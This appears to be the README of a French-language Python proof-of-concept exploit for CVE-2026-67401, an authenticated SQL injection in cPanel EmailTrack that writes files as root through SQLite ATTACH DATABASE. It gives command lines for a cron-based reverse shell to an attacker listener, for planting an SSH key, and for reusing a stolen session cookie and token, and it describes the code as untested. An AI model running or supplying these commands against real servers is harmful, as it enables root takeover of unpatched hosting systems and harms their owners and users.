
Preuve de concept en Python pour CVE-2026-67401, une injection SQL authentifiée dans cPanel EmailTrack permettant l'écriture arbitraire de fichiers en tant que root via SQLite ATTACH DATABASE, permettant un reverse shell ou le dépôt d'une clé SSH.
Injection SQL dans cPanel EmailTrack. Un utilisateur cPanel authentifié disposant de privilèges de messagerie écrit des fichiers arbitraires en tant que root via SQLite ATTACH DATABASE. Une seule requête vers root. Non testé sur une cible réelle, le code est uniquement assemblé à partir d'informations publiques et de diff basiques. Faites preuve de diligence en tant que chercheur, testez-le et envoyez des correctifs via PR.
Concerne toutes les versions cPanel/WHM antérieures au correctif du 8 septembre 2026.
requests# Shell inversé via cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# Dépôt de clé SSH
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# Session existante
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# Exécution à blanc (affiche la requête, ne l'envoie pas)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1